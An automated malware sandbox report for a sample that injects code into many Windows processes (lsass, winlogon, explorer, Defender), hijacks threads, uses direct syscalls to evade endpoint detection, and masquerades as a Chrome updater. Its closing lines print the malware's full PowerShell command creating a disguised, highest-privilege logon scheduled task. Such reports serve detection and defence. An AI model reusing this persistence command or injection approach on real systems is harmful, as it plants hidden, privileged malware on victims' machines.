Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 55D62908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DC3D2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 541C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 142B2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E6D72908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B0562908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 434A2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 18D72908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 33322908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 683C2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7CB92908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3DA82908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 21382908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 44C02908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B4772908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FC742908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3F802908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 71972908
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 81DA2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1A072908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 13BC2908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BD162908
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8C172908

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	NtAdjustPrivilegesToken: Direct from: 0x7FF6DD485C5E			Jump to behavior
Source: C:\Users\user\Desktop\h2qWqtD73F.exe	NtQuerySystemInformation: Direct from: 0x7FF752A45C5E			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2EA8A660000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 1CB338B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26E02790000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1C6CEEE0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25304F80000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 16C21130000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26F47BD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29B91DD0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 204227B0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20628780000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 182924D0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 28471250000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB3D3C0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29ABCEE0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2EA8A6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 1CB33910000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26E033A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1C6CEF40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25305540000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 16C21190000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26F48170000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29B92370000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20422AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20628E80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 18292570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB3DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29ABCF10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD9AD50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AF8C360000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 145854A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2CC6C080000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A6E9540000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BC418A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19D14D00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2251FF40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24CD3730000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2259C5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23504770000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22903F80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2158FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FD855A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2995E1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A880020000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: E60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E5EB130000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13949580000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 295CE1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2251A000000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2481AE30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D0873D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 2527E340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20217280000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26C3B960000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB42B30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19116860000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28D05730000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E30EAE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 238FF4E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D509FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1DC06A00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15E4FFA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C4A5A70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D18D60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23CDFD30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B7A1980000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1A53D510000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E88D40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 8EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C72BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1CF2C040000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2B555D60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 18EDC3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 153541C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20B142B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 225E6D70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 195B0560000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 219434A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2B118D70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F933320000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F9683C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1E47CB90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2673DA80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 21A21380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1CE44C00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 155B4770000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 255FC740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22D3F800000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 28471970000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C3A67E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 25E81DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FC1A070000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1AE13BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 21FBD160000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20C8C170000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 2592 base: 8EC0000 value: 4D

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\h2qWqtD73F.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Section loaded: NULL target: unknown protection: readonly	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\h2qWqtD73F.exe	Thread register set: target process: 8108	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Thread register set: target process: 7816	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Thread register set: target process: 1184	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Thread register set: target process: 1180	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\h2qWqtD73F.exe	Memory written: C:\Windows\System32\dialer.exe base: 2B90112010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2EA8A660000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 1CB338B0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26E02790000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1C6CEEE0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25304F80000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 16C21130000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26F47BD0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29B91DD0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 204227B0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20628780000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 182924D0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 28471250000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB3D3C0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29ABCEE0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 204227F0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2481ADF0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2481AA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2481AA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2481AA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2481AA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2481AA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2481AA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2481AA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2481AA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2481AA00000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 2481AA00000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 28B4362010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 5D09B7E010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 5CC55C4010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2EA8A6E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 1CB33910000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26E033A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1C6CEF40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25305540000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 16C21190000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26F48170000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29B92370000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20422AD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20628E80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 18292570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB3DA90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29ABCF10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD9AD50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AF8C360000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 145854A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2CC6C080000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A6E9540000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BC418A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19D14D00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2251FF40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24CD3730000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2259C5B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23504770000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22903F80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2158FFB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FD855A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2995E1C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A880020000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: E60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E5EB130000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13949580000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 295CE1B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2251A000000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2481AE30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D0873D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 2527E340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20217280000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26C3B960000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB42B30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19116860000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28D05730000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E30EAE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 238FF4E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D509FC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1DC06A00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15E4FFA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C4A5A70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D18D60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23CDFD30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B7A1980000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1A53D510000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E88D40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 8EC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C72BA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1CF2C040000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2B555D60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 18EDC3D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 153541C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20B142B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 225E6D70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 195B0560000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 219434A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2B118D70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F933320000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F9683C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1E47CB90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2673DA80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 21A21380000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1CE44C00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 155B4770000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 255FC740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22D3F800000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe base: 28471970000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C3A67E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 25E81DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FC1A070000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 1AE13BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 21FBD160000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 20C8C170000

Source: C:\Users\user\Desktop\h2qWqtD73F.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#polrad#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'googleupdatetaskmachineqc' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -runlevel 'highest' -force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#polrad#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'googleupdatetaskmachineqc' /tr '''c:\users\user\appdata\roaming\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -runlevel 'highest' -force; }
